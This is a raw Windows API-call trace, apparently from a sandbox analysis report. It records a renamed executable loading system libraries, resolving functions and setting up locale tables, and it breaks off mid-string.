0x7514fd10 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0299.245] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0299.245] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0299.245] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0299.246] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0299.246] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0299.247] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0299.247] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0299.247] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0299.247] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0299.247] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0299.247] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0299.247] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0299.247] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0299.247] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0299.247] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0299.247] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0299.247] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0299.248] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0299.248] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0299.248] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0299.248] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0299.248] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0299.248] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0299.248] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x74730000 [0299.248] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoW") returned 0x74731580 [0299.248] GetProcAddress (hModule=0x74730000, lpProcName="VerQueryValueW") returned 0x74731500 [0299.248] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoSizeW") returned 0x74731560 [0299.248] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0299.249] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0299.249] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x5fdb1f5d, dwHighDateTime=0x1d45ac6)) [0299.249] GetCurrentThreadId () returned 0xcc0 [0299.249] GetCurrentProcessId () returned 0xcbc [0299.249] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34671131203) returned 1 [0299.249] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0299.249] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0299.249] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0299.249] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0299.249] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0299.249] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0299.249] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0299.249] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0299.249] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0299.249] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0299.250] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0299.251] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0299.251] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0299.251] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0299.251] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0299.251] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0299.251] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0299.251] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0299.251] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0299.251] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0299.251] GetCurrentThreadId () returned 0xcc0 [0299.251] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x4c803fe0, hStdError=0x475810)) [0299.252] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0299.252] GetFileType (hFile=0x38) returned 0x2 [0299.252] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc0 [0299.252] GetFileType (hFile=0xc0) returned 0x3 [0299.252] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0299.252] GetFileType (hFile=0x40) returned 0x2 [0299.252] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner" [0299.252] GetEnvironmentStringsW () returned 0x631e20* [0299.252] FreeEnvironmentStringsW (penv=0x631e20) returned 1 [0299.252] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0299.253] GetLastError () returned 0x0 [0299.253] SetLastError (dwErrCode=0x0) [0299.253] GetLastError () returned 0x0 [0299.253] SetLastError (dwErrCode=0x0) [0299.253] GetLastError () returned 0x0 [0299.253] SetLastError (dwErrCode=0x0) [0299.253] GetACP () returned 0x4e4 [0299.253] GetLastError () returned 0x0 [0299.253] SetLastError (dwErrCode=0x0) [0299.253] IsValidCodePage (CodePage=0x4e4) returned 1 [0299.253] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0299.253] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0299.253] GetLastError () returned 0x0 [0299.253] SetLastError (dwErrCode=0x0) [0299.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0299.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0299.253] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0299.253] GetLastError () returned 0x0 [0299.253] SetLastError (dwErrCode=0x0) [0299.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0299.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0299.254] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0299.254] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0299.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x70\x3e\x80\x4c\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0299.254] GetLastError () returned 0x0 [0299.254] SetLastError (dwErrCode=0x0) [0299.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0299.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0299.254] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0299.254] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0299.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3